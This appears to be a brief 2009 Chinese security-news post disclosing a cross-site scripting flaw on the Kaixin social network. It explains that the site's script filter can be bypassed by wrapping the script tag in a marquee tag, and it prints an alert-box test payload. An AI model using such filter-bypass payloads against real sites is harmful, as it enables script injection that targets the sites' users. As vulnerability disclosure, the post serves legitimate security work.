pc软件文章资讯手机软件

位置：绿色联盟 > 图文中心 → 新闻资讯 → 安全播报 →开心网一个XSS漏洞

开心网一个XSS漏洞

2009/8/25 来源:www.arpun.com 作者:小白

虽然过滤了 <script> 但只过滤不够严格只要在开头不使用<script> 就可以执行

下边是漏洞地址以及测试代码

<marquee><script>alert('XSS')</script></marquee>

网友评论

评论（...）

全部评论